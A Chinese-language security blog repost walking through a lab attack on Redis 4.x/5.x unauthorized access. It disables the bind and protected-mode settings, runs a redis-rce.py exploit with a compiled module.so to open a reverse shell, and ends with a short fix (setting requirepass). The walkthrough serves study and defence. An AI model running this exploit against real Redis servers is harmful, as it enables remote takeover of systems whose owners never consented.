Redis 4.x 5.x 未授权访问 _

admin 2023年12月4日11:59:51评论9 views字数 814阅读2分42秒阅读模式

#############################

免责声明:本文仅作收藏学习之用,亦希望大家以遵守《网络安全法》相关法律为前提学习,切勿用于非法犯罪活动,对于恶意使用造成的损失,和本人及作者无关。

##############################

Redis 4.x 5.x 未授权访问 _

环境搭建

5.0版本下载

wget http://download.redis.io/releases/redis-5.0.5.tar.gz

tar xzf redis-5.0.0.tar.gz
cd redis-5.0.5
make

修改配置文件运行远程访问

1、将redis.conf文件中的bind 127.0.0.1 这行前面加注释(#); 2、将redis.conf文件中的 protected-mode yes 改为no;


运行Redis

./redis-server /root/redis/redis-5.0.0/redis.conf


下载EXP

git clone 

git clone

编译module.so文件:

Redis 4.x 5.x 未授权访问 _

将编译完的module.so复制到redis-rce目录下,然后执行以下命令:

Redis 4.x 5.x 未授权访问 _

python redis-rce.py -r 127.0.0.1 -L 127.0.0.1 -f module.so


 -r参数是指远程Redis IP地址; -L参数是指反弹到的服务器IP地址; 执行命令后,开启监听了本地的60720端口,并成功反弹回了shell。

Redis 4.x 5.x 未授权访问 _

修复建议

这是针对redis未授权访问的漏洞 这里直接redis.conf文件里面的  requirepass 参数取消注释   这里5.0是默认开启未授权访问的

Redis 4.x 5.x 未授权访问 _


原文始发于微信公众号(菜鸟小新):Redis 4.x 5.x 未授权访问 _

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月4日11:59:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Redis 4.x 5.x 未授权访问 _https://cn-sec.com/archives/2262790.html

发表评论

匿名网友 填写信息